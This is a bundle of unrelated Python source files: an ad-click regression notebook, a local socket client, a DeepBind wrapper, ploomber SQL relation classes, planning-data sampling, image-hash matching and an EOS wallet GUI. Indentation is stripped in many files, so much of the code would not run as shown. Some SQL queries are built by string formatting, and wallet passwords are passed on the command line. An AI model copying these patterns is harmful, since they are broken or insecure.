# Displaying relationship between Daily Time Spent on Site and Age
sns.jointplot(y='Daily Time Spent on Site', x='Age', data = ad_data,kind='kde',color='g', fill=True)
# Comment: younger users spend more time on the site than older ones
# %%
# Displaying relationship between Daily Time Spent on Site and Daily Internet Usage
sns.jointplot(y='Daily Time Spent on Site', x='Daily Internet Usage', data = ad_data,kind='reg',color='g')
# Comment: there seem to be two groups: (i) high daily internet usage associated with high
#          daily time spent on site, and (ii) low usage associated with low time on site.
# %%
# Checking all the possible relationships among variables
sns.pairplot(data=ad_data,hue='Clicked on Ad',kind='hist',diag_kind='auto',corner=True)
# Comment: people who click on the ad use the internet less than those who do not,
#          regardless of age, time spent on site or area income.
#          The same pattern holds for time spent on site. Those who click also seem to be
#          older, on average, than those who do not.
# %%
## TRAINING AND TESTING THE MODEL
# Establishing the data we'll work with as well as defining training and testing samples
X = ad_data.drop(['Clicked on Ad','Ad Topic Line','City','Country','Timestamp'],axis = 1)
y = ad_data['Clicked on Ad']
# NOTICE: I did not consider City or Country because I did not have enough representation for
# each of these categories (i.e., just 4/5 people from each country)
X_train, X_test, y_train, y_test = train_test_split(X,y,test_size = 0.3)
# Instantiating a logistic regression model and training it
logm = LogisticRegression()
logm.fit(X_train,y_train)
#%%
# Predicting whether a user clicked on the ad (test set)
predic = logm.predict(X_test)
# Checking performance
print('Classification Report')
print(classification_report(y_test,predic))
print('\nConfusion Matrix')
print(confusion_matrix(y_test,predic))
|
import socket
import random
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
TCP_IP = '127.0.0.1'
port = 15710
s.connect((TCP_IP,port))
BUFFER = 1024
x = 2
print(x)
s.sendall(str(x).encode("utf-8"))
#waiting for message
while True:
data = s.recv(BUFFER)
if data:
break
x = data.decode("utf-8")
print("received sum is = {}".format(x))
s.close()
|
"""Wrapper for pretrained Deepbind via Kipoi."""
import numpy as np
from spacy.tokens import Doc
from spacy.vocab import Vocab
from spacy.language import Language
from concise.preprocessing.sequence import encodeDNA, encodeRNA
from ....core import Task, DataType
from ...kipoi.core import KipoiModel
DEEPBIND_CLASSES = ['NotBinding', 'Binding']
ALPHABET = {'TF': ['T', 'C', 'G', 'A', 'N'], 'RBP': ['U', 'C', 'G', 'A', 'N']}
ONE_HOT_ENCODER = {'TF': encodeDNA, 'RBP': encodeRNA}
def create_sequence_language(alphabet):
"""Anchor accepts a spacy language for sampling the neighborhood."""
vocab = Vocab(strings=alphabet)
def make_doc(sequence):
sequence = sequence.replace(' ', '')
if len(sequence) == 0:
words = np.random.choice(alphabet)
else:
words = list(sequence)
return Doc(vocab, words=words, spaces=[False] * len(words))
return Language(vocab, make_doc)
def create_DNA_language():
return create_sequence_language(alphabet=ALPHABET['TF'])
def create_RNA_language():
    return create_sequence_language(alphabet=ALPHABET['RBP'])
def character_correction(sequences_list, min_length, null_character='N'):
"""
Some perturbation based interpretability methods (e.g. lime)
might introduce null characters which are not viable input.
These are by default replaced with 'N' (for any character).
The sequence is padded to min_length characters.
"""
return [
s.replace('\x00', null_character).ljust(min_length, null_character)
for s in sequences_list
]
def preprocessing_function(
nucleotide_sequence, sequence_type, min_length=35, null_character='N'
):
"""One-hot-encode the sequence and allow passing single string."""
if isinstance(nucleotide_sequence, str):
sequences_list = [nucleotide_sequence]
else:
if not hasattr(nucleotide_sequence, '__iter__'):
raise IOError(
f'Expected a str or iterable, got {type(nucleotide_sequence)}.'
)
sequences_list = nucleotide_sequence
return ONE_HOT_ENCODER[sequence_type](
character_correction(sequences_list, min_length, null_character)
)
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def postprocessing_function(binding_score, use_labels=True):
"""Instead of a score, interpreters expect labels or probabilities."""
if use_labels:
return binding_score > 0 # binding_probs > 0.5
else:
# not a score, but probability in [0,1]
binding_probs = np.expand_dims(sigmoid(binding_score), axis=1)
return np.hstack([1. - binding_probs, binding_probs])
class DeepBind(KipoiModel):
"""Deepbind wrapper via kipoi."""
def __init__(self, model, use_labels=True, min_length=0):
"""
Constructor.
Args:
model (string): kipoi model name.
            use_labels (bool): if False, use probabilities instead of labels.
            min_length (int): minimal length of sequence used for eventual
                padding with null_character ('N'). Some deepbind models fail
                with too short sequences, in that case increase min_length.
        On top of the kipoi model prediction, the predict method of this class
        will preprocess a string sequence to one hot encoding, using the
        model name to determine `sequence_type` ('TF' or 'RBP').
It will also return not a binding score but either a classification
label or 'NotBinding','Binding' probabilities expected by interpreters.
"""
super().__init__(
model=model,
task=Task.CLASSIFICATION,
data_type=DataType.TEXT,
source='kipoi',
with_dataloader=False,
preprocessing_function=preprocessing_function,
preprocessing_kwargs={},
postprocessing_function=postprocessing_function,
postprocessing_kwargs={},
)
# kwargs
self.use_labels = use_labels
# self.model.schema.inputs.doc is always "DNA Sequence", use name
self.sequence_type = model.split('/')[2] # 'TF' or 'RBP'
self.min_length = min_length
def predict(self, sample):
self.preprocessing_kwargs['sequence_type'] = self.sequence_type
self.preprocessing_kwargs['min_length'] = self.min_length
self.postprocessing_kwargs['use_labels'] = self.use_labels
return super().predict(sample)
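# Example usage (a sketch, not part of the original module; the kipoi model name below is a
# hypothetical identifier of the form 'DeepBind/<species>/<TF-or-RBP>/<experiment>' and the
# sequence is illustrative -- running it requires a working kipoi installation):
#
#   model = DeepBind('DeepBind/Homo_sapiens/TF/D00328.018_ChIP-seq_CTCF',
#                    use_labels=False, min_length=35)
#   probs = model.predict('ACGTACGTACGTACGTACGTACGTACGTACGTACG')
#   # probs has shape (1, 2): columns are [P(NotBinding), P(Binding)]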
|
"""
Generate a list of N colors starting from color1 to color2 in RGB or HSV space
"""
from __future__ import print_function
print(__doc__)
from vtkplotter.colors import makePalette, getColorName
cols = makePalette("red", "blue", 10, hsv=True)
for c in cols:
print("rgb =", c, " closest color is:", getColorName(c))
|
import sqlite3
import json
from ploomber.products import Product
from ploomber.products.serializers import Base64Serializer
from ploomber.templates.Placeholder import SQLRelationPlaceholder
class SQLiteRelation(Product):
"""A SQLite relation
Parameters
----------
identifier: tuple of length 3
A tuple with (schema, name, kind) where kind must be either 'table'
or 'view'
client: ploomber.clients.DBAPIClient or SQLAlchemyClient, optional
The client used to connect to the database. Only required
if no dag-level client has been declared using dag.clients[class]
"""
def __init__(self, identifier, client=None):
super().__init__(identifier)
self._identifier._schema = None
self._client = client
def _init_identifier(self, identifier):
if identifier[0] is not None:
raise ValueError('SQLite does not support schemas, you should '
'pass None')
        # SQLRelationPlaceholder needs a schema value, so we use a dummy value
        # for initialization
        # FIXME: this is hacky, refactor SQLRelationPlaceholder
identifier = ('', identifier[1], identifier[2])
return SQLRelationPlaceholder(identifier)
@property
def client(self):
if self._client is None:
default = self.task.dag.clients.get(type(self))
if default is None:
raise ValueError('{} must be initialized with a client'
.format(type(self).__name__))
else:
self._client = default
return self._client
def _create_metadata_relation(self):
create_metadata = """
CREATE TABLE IF NOT EXISTS _metadata (
name TEXT PRIMARY KEY,
metadata BLOB
)
"""
self.client.execute(create_metadata)
def fetch_metadata(self):
self._create_metadata_relation()
query = """
SELECT metadata FROM _metadata
WHERE name = '{name}'
""".format(name=self._identifier.name)
cur = self.client.connection.cursor()
cur.execute(query)
records = cur.fetchone()
cur.close()
if records:
metadata_bin = records[0]
return json.loads(metadata_bin.decode("utf-8"))
else:
return None
def save_metadata(self):
self._create_metadata_relation()
metadata_bin = json.dumps(self.metadata).encode('utf-8')
query = """
REPLACE INTO _metadata(metadata, name)
VALUES(?, ?)
"""
cur = self.client.connection.cursor()
cur.execute(query, (sqlite3.Binary(metadata_bin),
self._identifier.name))
self.client.connection.commit()
cur.close()
def exists(self):
query = """
SELECT name
FROM sqlite_master
WHERE type = '{kind}'
AND name = '{name}'
""".format(kind=self._identifier.kind,
name=self._identifier.name)
cur = self.client.connection.cursor()
cur.execute(query)
exists = cur.fetchone() is not None
cur.close()
return exists
def delete(self):
"""Deletes the product
"""
query = ("DROP {kind} IF EXISTS {relation}"
.format(kind=self._identifier.kind,
relation=str(self)))
        self.logger.debug('Running "{query}" on the database...'
.format(query=query))
self.client.execute(query)
@property
def name(self):
return self._identifier.name
@property
def schema(self):
return self._identifier.schema
class PostgresRelation(Product):
"""A PostgreSQL relation
Parameters
----------
identifier: tuple of length 3
A tuple with (schema, name, kind) where kind must be either 'table'
or 'view'
client: ploomber.clients.DBAPIClient or SQLAlchemyClient, optional
The client used to connect to the database. Only required
if no dag-level client has been declared using dag.clients[class]
"""
# FIXME: identifier has schema as optional but that introduces ambiguity
# when fetching metadata and checking if the table exists so maybe it
# should be required
def __init__(self, identifier, client=None):
self._client = client
super().__init__(identifier)
def _init_identifier(self, identifier):
return SQLRelationPlaceholder(identifier)
@property
def client(self):
if self._client is None:
default = self.task.dag.clients.get(type(self))
if default is None:
raise ValueError('{} must be initialized with a client'
.format(type(self).__name__))
else:
self._client = default
return self._client
def fetch_metadata(self):
cur = self.client.connection.cursor()
if self._identifier.schema:
schema = self._identifier.schema
else:
# if schema is empty, we have to find out the default one
query = """
SELECT replace(setting, '"$user", ', '')
FROM pg_settings WHERE name = 'search_path';
"""
cur.execute(query)
schema = cur.fetchone()[0]
# https://stackoverflow.com/a/11494353/709975
query = """
SELECT description
FROM pg_description
JOIN pg_class ON pg_description.objoid = pg_class.oid
JOIN pg_namespace ON pg_class.relnamespace = pg_namespace.oid
WHERE nspname = %(schema)s
AND relname = %(name)s
"""
cur.execute(query, dict(schema=schema,
name=self._identifier.name))
metadata = cur.fetchone()
cur.close()
# no metadata saved
if metadata is None:
return None
else:
return Base64Serializer.deserialize(metadata[0])
# TODO: also check if metadata does not give any parsing errors,
# if yes, also return a dict with None values, and maybe emit a warn
def save_metadata(self):
metadata = Base64Serializer.serialize(self.metadata)
query = (("COMMENT ON {} {} IS '{}';"
.format(self._identifier.kind,
self._identifier,
metadata)))
cur = self.client.connection.cursor()
cur.execute(query)
self.client.connection.commit()
cur.close()
def exists(self):
cur = self.client.connection.cursor()
if self._identifier.schema:
schema = self._identifier.schema
else:
# if schema is empty, we have to find out the default one
query = """
SELECT replace(setting, '"$user", ', '')
FROM pg_settings WHERE name = 'search_path';
"""
cur.execute(query)
schema = cur.fetchone()[0]
# https://stackoverflow.com/a/24089729/709975
query = """
SELECT EXISTS (
SELECT 1
FROM pg_catalog.pg_class c
JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace
WHERE n.nspname = %(schema)s
AND c.relname = %(name)s
);
"""
cur.execute(query, dict(schema=schema,
name=self._identifier.name))
exists = cur.fetchone()[0]
cur.close()
return exists
def delete(self, force=False):
"""Deletes the product
"""
cascade = 'CASCADE' if force else ''
query = f"DROP {self._identifier.kind} IF EXISTS {self} {cascade}"
        self.logger.debug(f'Running "{query}" on the database...')
cur = self.client.connection.cursor()
cur.execute(query)
cur.close()
self.client.connection.commit()
@property
def name(self):
return self._identifier.name
@property
def schema(self):
return self._identifier.schema
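# Example usage (a sketch, not part of the original module; the identifiers are illustrative
# and a client must be supplied here or at the DAG level, as described in the docstrings above):
#
#   sqlite_product = SQLiteRelation((None, 'clean_data', 'table'))
#   postgres_product = PostgresRelation(('public', 'clean_data', 'table'))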
|
import logging
from collections import defaultdict
from typing import Dict, List
from strips_hgn.planning import STRIPSProblem
from strips_hgn.training_data import StateValuePair, TrainingPair
from strips_hgn.utils.metrics import CountMetric, metrics_logger
from collections import Counter
import numpy as np
_log = logging.getLogger(__name__)
def merge_state_value_pairs_by_domain(
problem_to_state_value_pairs: Dict[STRIPSProblem, List[StateValuePair]],
remove_duplicates: bool = False,
mode = None
) -> Dict[str, List[TrainingPair]]:
"""
Generates a mapping of domain to corresponding TrainingPairs.
The state-value pairs are merged by domain, and corresponding TrainingPair
objects are created.
The TrainingPair objects contain the problem, which we use to generate the
hypergraph later on.
Parameters
----------
problem_to_state_value_pairs: mapping of STRIPSProblem to a list of
state-value pairs
remove_duplicates: whether to remove duplicate TrainingPairs, not
implemented at the moment
Returns
-------
Mapping of domain name to List[TrainingPair]
"""
# Domain to training pairs. We determine a unique domain by its name
domain_to_training_pairs = defaultdict(list)
_log.debug("Start creating Training Pairs.")
for problem, state_value_pairs in problem_to_state_value_pairs.items():
# Create TrainingPair objects which hold the problem context
training_pairs = [
TrainingPair(problem, state_value_pair)
for state_value_pair in state_value_pairs
]
domain_to_training_pairs[problem.domain_name].extend(training_pairs)
_log.debug("Start sampling Training Pairs.")
    # Sub-sample the training pairs of each domain so that every (problem, heuristic value)
    # combination is equally likely to be drawn (the weights computed below sum to 1).
for domain, training_pairs in domain_to_training_pairs.items():
prob_cnt = defaultdict(lambda: Counter())
probs = []
num_prob_value = 0
for t in training_pairs:
prob_cnt[t.problem][t.value] += 1
for prob in prob_cnt.keys():
num_prob_value += len(prob_cnt[prob].keys())
for t in training_pairs:
probs.append(1/(num_prob_value*prob_cnt[t.problem][t.value]))
# n_value_min = min(cnt.values())
# n_value = len(cnt.keys())
# _log.info("The smallest set of a heuristic value has {} samples, there are {} different heuristic values.".format(n_value_min, n_value))
if mode:
data_amount = mode.get('bound', 300)
else:
data_amount = 300
if len(training_pairs) > data_amount:
# if n_value*n_value_min <= 10000:
# n = n_value*n_value_min
# else:
# n = 10000
# elif len(training_pairs) > 300:
n = data_amount
else:
n = len(training_pairs)
# n = n_value*n_value_min if len(training_pairs) > 300 and n_value*n_value_min > 300 else len(training_pairs)
# print("/////////////////////////", n, len(training_pairs))
domain_to_training_pairs[domain] = np.random.choice(training_pairs, size=n, replace=False, p=probs).tolist()
if remove_duplicates:
# TODO: figure out best way to implement this
# Options: (option 2 is strongly preferred)
# 1. Remove duplicates based on state and value only
# 2. Remove duplicates based on hypergraph structure, state and value
raise NotImplementedError
# Metrics
total_num_pairs = 0
for domain, training_pairs in domain_to_training_pairs.items():
metrics_logger.add_metric(
CountMetric(
"NumberofMergedTrainingPairs",
len(training_pairs),
context={"domain": domain},
)
)
_log.debug(
f"Merged {len(training_pairs)} training pairs for '{domain}'"
)
total_num_pairs += len(training_pairs)
_log.info(f"Merged {total_num_pairs} training pairs in total")
metrics_logger.add_metric(
CountMetric("TotalNumberOfMergedTrainingPairs", total_num_pairs)
)
return domain_to_training_pairs
|
import multiprocessing as mp
from sys import path
from tqdm import trange
import imagehash
from PIL import Image
import os
from DoraemonPocket.src.utils import log_error
from DoraemonPocket.src.multiprocessor import multiprocessing
HASH_DICTS = {
"ahash" : imagehash.average_hash,
"phash" : imagehash.phash,
"dhash" : imagehash.dhash,
"whash-haar" : imagehash.whash,
"colorhash" : imagehash.colorhash,
"crop-resistant" : imagehash.crop_resistant_hash
}
def init_hash_table(path:str, hash_func):
hash_table = hash_func(Image.open(path))
return hash_table
def find_hash(tar_hash:str, source_hash_table:list):
try:
return source_hash_table.index(tar_hash)
except:
return -1
def find_paired(sources:list, targets:list, hash_func:str="ahash"):
    '''Find target images from source images.
Using multiprocessing.
Args:
sources (list[str]): source images' paths.
targets (list[str]): target images' paths.
hash_func (str) [optional]: Options "ahash", "phash", "dhash", "whash-haar", "colorhash", "crop-resistant". See https://github.com/JohannesBuchner/imagehash for details.
Returns:
pairs [str, ..., str], [str, ..., str]: source paths and paired target paths
'''
assert type(sources)==list, log_error("sources should be list, ", find_paired)
assert type(targets)==list, log_error("targets should be list, ", find_paired)
assert hash_func in HASH_DICTS.keys(), log_error("hash_func option not permitted, ", find_paired)
for s in sources+targets:
        assert os.path.exists(s), log_error("{} does not exist".format(s))
src_hash_table = multiprocessing(init_hash_table, sources, HASH_DICTS[hash_func])
tar_hash_table = multiprocessing(init_hash_table, targets, HASH_DICTS[hash_func])
idx = multiprocessing(find_hash, tar_hash_table, [src_hash_table for _ in range(len(tar_hash_table))])
    pairs = [[], []]
    for i, src_idx in enumerate(idx):
        if src_idx == -1:
            # no source image matched this target's hash
            continue
        pairs[0].append(sources[src_idx])
        pairs[1].append(targets[i])
    return pairs
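# Example usage (a sketch, not part of the original module; the directory and file names
# are illustrative):
#
#   sources = ["data/source/a.jpg", "data/source/b.jpg"]
#   targets = ["data/target/b_resaved.jpg"]
#   src_paths, tar_paths = find_paired(sources, targets, hash_func="phash")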
|
#!/usr/bin/env python
# coding: utf-8
from tkinter import Tk
from gui.ui import UI
from core import DOCKER_CONTAINER_NAME
from core import TIMEOUT
from core import btc, bch, dash, eth, ltc, neo, xmr
import subprocess
import os
import signal
def run():
global app
root = Tk()
app = UI(root)
# Application
getCleosCommand()
# print(app.tabPanel.producer.get())
root.lift()
root.attributes('-topmost', True)
root.attributes('-topmost', False)
root.mainloop()
def handler(signum, frame):
raise RuntimeError("End of time")
def getCleosCommand():
    # TODO The docker path has to be removed since it was deprecated.
global DOCKER_COMMAND
DOCKER_COMMAND = ['docker', 'exec', DOCKER_CONTAINER_NAME]
CLEOS_COMMAND = ['/opt/eosio/bin/cleos', '-h']
    global cleos
    cleos = ['cleos']  # default; kept if the check below fails so later calls do not raise NameError
# try:
# subprocess.check_output(DOCKER_COMMAND+CLEOS_COMMAND)
# except OSError as e:
# cleos = ['cleos']
# except Exception as e:
# cleos = ['cleos']
# else:
# cleos = ['docker', 'exec', DOCKER_CONTAINER_NAME, '/opt/eosio/bin/cleos']
try:
subprocess.check_output(['cleos', '-h'])
except OSError as e:
app.outputPanel.logger('Can not find the cleos command.\n' + str(e))
except Exception as e:
app.outputPanel.logger('Something went wrong \n' + str(e))
else:
cleos = ['cleos']
# Logic functions
def getProducerInfo():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'get', 'info'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Producer is not available\n' + str(e)
except Exception as e:
print(e)
out = 'Could not get info.\n' + str(e)
finally:
app.outputPanel.logger(out)
def getBlockInfo():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(),
'get', 'block', app.tabPanel.blockNumber.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get block info\n' + str(e)
except Exception as e:
print(e)
out = 'Could not get block info.\n' + str(e)
finally:
app.outputPanel.logger(out)
def getBlockProducers():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(),
'system', 'listproducers'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get producer list\n' + str(e)
except Exception as e:
print(e)
out = "Could not get producer list.\n" + str(e)
finally:
app.outputPanel.logger(out)
def getWalletList():
try:
out = subprocess.run(cleos + ['wallet', 'list'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get wallet list\n' + str(e)
except Exception as e:
print(e)
out = "Could not get wallet list. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getWalletListFilesystem():
if 'docker' in cleos:
# docker exec eos ls /root/eosio-wallet | egrep '\.wallet$'
out = b"Found wallets in filesystem inside docker container:\n> /root/eosio-wallet\n\n"
com = " ".join(DOCKER_COMMAND + ['ls', '/root/eosio-wallet', '|', 'egrep', '\.wallet$'])
out += subprocess.check_output(com, shell=True)
else:
# ls ~/eosio-wallet | egrep '\.wallet$'
out = b"Found wallets in filesystem:\n> ~/eosio-wallet\n\n"
com = " ".join(['ls', '~/eosio-wallet', '|', 'egrep', '\.wallet$'])
out += subprocess.check_output(com, shell=True)
app.outputPanel.logger(out)
def createWallet():
toConsole = app.tabPanel.toConsole.get()
if 'docker' in cleos:
        # docker - cleos wallet create -n twal --file /root/twal saved inside docker /root/
try:
if toConsole == '--to-console':
out = subprocess.run(cleos + ['wallet', 'create', '-n', app.tabPanel.walletName.get(),
'--to-console'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
elif toConsole == '--file':
out = subprocess.run(cleos + ['wallet', 'create', '-n', app.tabPanel.walletName.get(),
'--file', "/root/" + app.tabPanel.walletName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not create wallet\n' + str(e)
except Exception as e:
print(e)
out = "Could not create wallet.\n" + str(e)
finally:
app.tabPanel.openWalletName.insert(0, app.tabPanel.walletName.get())
app.outputPanel.logger(out)
else:
walletDir = os.environ['HOME'] + '/eosio-wallet'
if not os.path.exists(walletDir):
os.makedirs(walletDir)
try:
if toConsole == '--to-console':
out = subprocess.run(cleos + ['wallet', 'create', '-n', app.tabPanel.walletName.get(),
'--to-console'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
elif toConsole == '--file':
out = subprocess.run(cleos + ['wallet', 'create', '-n', app.tabPanel.walletName.get(),
'--file', walletDir + "/" + app.tabPanel.walletName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not create wallet\n' + str(e)
except Exception as e:
print(e)
out = "Could not create wallet.\n" + str(e)
finally:
app.tabPanel.openWalletName.insert(0, app.tabPanel.walletName.get())
app.outputPanel.logger(out)
def openWallet():
try:
out = subprocess.run(cleos + ['wallet', 'open', '-n', app.tabPanel.openWalletName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not open the wallet\n' + str(e)
except Exception as e:
print(e)
out = 'Could not open the wallet.\n' + str(e)
finally:
if 'Opened' in out:
out += "\nRemember this wallet as default for this core session!"
app.outputPanel.logger(out)
def unlockWallet(password):
try:
out = subprocess.run(cleos + ['wallet', 'unlock', '-n', app.tabPanel.openWalletName.get(), '--password', password],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Unlock the wallet\n' + str(e)
except Exception as e:
print(e)
out = 'Could not unlock the wallet.\n' + str(e)
finally:
app.outputPanel.logger(out)
def showKeys():
try:
out = subprocess.run(cleos + ['wallet', 'keys'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not show keys\n' + str(e)
except Exception as e:
print(e)
out = 'Could not show keys.\n' + str(e)
finally:
app.outputPanel.logger(out)
def showPrivateKeys(password):
try:
out = subprocess.run(cleos + ['wallet', 'private_keys', '-n', app.tabPanel.openWalletName.get(), '--password', password],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not show private keys\n' + str(e)
except Exception as e:
print(e)
out = 'Could not show private keys.\n' + str(e)
finally:
app.outputPanel.logger(out)
def importKey(key):
try:
out = subprocess.run(cleos + ['wallet', 'import', '-n', app.tabPanel.openWalletName.get(), '--private-key', key],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not import the key\n' + str(e)
except Exception as e:
print(e)
out = 'Could not import the key.\n' + str(e)
finally:
app.outputPanel.logger(out)
def createKeys():
# TODO add --tofile feature
try:
out = subprocess.run(cleos + ['create', 'key', '--to-console'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not create keys\n' + str(e)
except Exception as e:
print(e)
out = 'Could not create keys.\n' + str(e)
finally:
app.outputPanel.logger(out)
def compileContract():
cpp = app.tabPanel.contractFileCPP.get()
wasm = app.tabPanel.contractFileWASM.get()
wast = app.tabPanel.contractFileWAST.get()
abi = app.tabPanel.contractFileABI.get()
try:
out = subprocess.run(['eosio-cpp', '-o', wasm, cpp, '--abigen'],
timeout=TIMEOUT+60, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not compile contract\n' + str(e)
except Exception as e:
print(e)
out = 'Could not compile contract.\n' + str(e)
finally:
if 'error' in out:
app.outputPanel.logger(out)
else:
app.outputPanel.logger("Compile successful\n\n" + out)
try:
out = subprocess.run(['eosio-cpp', '-o', wast, cpp, '--abigen'],
timeout=TIMEOUT+60, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not compile contract\n' + str(e)
except Exception as e:
print(e)
out = 'Could not compile contract.\n' + str(e)
finally:
if 'error' in out:
app.outputPanel.logger(out)
else:
app.outputPanel.logger("Compile successful\n\n" + out)
def setContract():
cpp = app.tabPanel.contractFileCPP.get()
wasm = app.tabPanel.contractFileWASM.get()
wast = app.tabPanel.contractFileWAST.get()
abi = app.tabPanel.contractFileABI.get()
try:
out_code = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'set', 'code', app.tabPanel.accountName.get(), wasm],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out_abi = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'set', 'abi', app.tabPanel.accountName.get(), abi],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out_code = out_code.stdout.decode('utf-8')
out_abi = out_abi.stdout.decode('utf-8')
out = str(out_code) + str(out_abi)
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not set contract\n' + str(e)
except Exception as e:
print(e)
out = 'Could not set contract.\n' + str(e)
finally:
app.outputPanel.logger("Contract successfully pished to the net.\n\n" + out)
def getAccountBalance():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get() ,'get', 'currency', 'balance', 'eosio.token', app.tabPanel.accountName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account balance\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account balance. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getAccountDetails():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get() ,'get', 'account', app.tabPanel.accountName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account details\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account details. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getAccountActions():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'get', 'actions', app.tabPanel.accountName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account actions\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account actions. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getAccountCode():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'get', 'code', app.tabPanel.accountName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account code\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account code. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getAccountAbi():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'get', 'abi', app.tabPanel.accountName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account abi\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account abi. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getAccountTable():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'get', 'table', app.tabPanel.accountName.get(), app.tabPanel.accountScope.get(), app.tabPanel.accountTable.get(), '-L', app.tabPanel.accountLower.get(), '-l', app.tabPanel.accountLimit.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account table\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account table. \n" + str(e)
finally:
app.outputPanel.logger(out)
def buyRam():
creator = app.tabPanel.accountCreator.get()
owner = app.tabPanel.accountOwner.get()
ram = app.tabPanel.ram.get()
# #buy ram for yourself
# cleos system buyram someaccount1 someaccount1 "10 EOS"
#
# #buy ram for someone else
# cleos system buyram someaccount1 someaccount2 "1 EOS"
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'system', 'buyram', creator, owner, ram],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not buy RAM\n' + str(e)
except Exception as e:
print(e)
